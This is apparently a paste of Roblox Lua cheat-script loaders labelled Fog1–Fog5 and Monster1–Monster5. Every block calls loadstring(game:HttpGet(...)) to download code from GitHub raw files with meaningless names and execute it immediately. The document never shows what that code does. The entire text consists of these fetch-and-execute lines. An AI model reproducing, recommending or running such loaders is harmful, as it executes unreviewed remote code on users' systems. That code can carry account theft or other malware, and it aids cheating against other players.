---------------------MULTIMONSTER---------------------

----Fog1
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/ytu/main/Hdhshshs"))()
end)()
----

----Fog2
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/ytu/main/Hdhshshs"))()
end)()
----

----Fog3
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/ytu/main/Hdhshshs"))()
end)()
----

----Fog4
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/ytu/main/Hdhshshs"))()
end)()
----

----Fog5
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/ytu/main/Hdhshshs"))()
end)()
----

----Monster1
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/hcbh/main/ffgfgfhgfutyy"))()
end)()
----

----Monster2
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/hcbh/main/hsgsjshzhshdhdhhddhdejhei%E1%BB%B7736"))()
end)()
----

----Monster3
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/hcbh/main/hsgsjshzhshdhdhhddhdejhei%E1%BB%B7736"))()
end)()
----

----Monster4
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/hcbh/main/hsgsjshzhshdhdhhddhdejhei%E1%BB%B7736"))()
end)()
----

----Monster5
coroutine.wrap(function()
wait()
loadstring(game:HttpGet("https://raw.githubusercontent.com/huyhoangphuc/hcbh/main/hsgsjshzhshdhdhhddhdejhei%E1%BB%B7736"))()
end)()
----
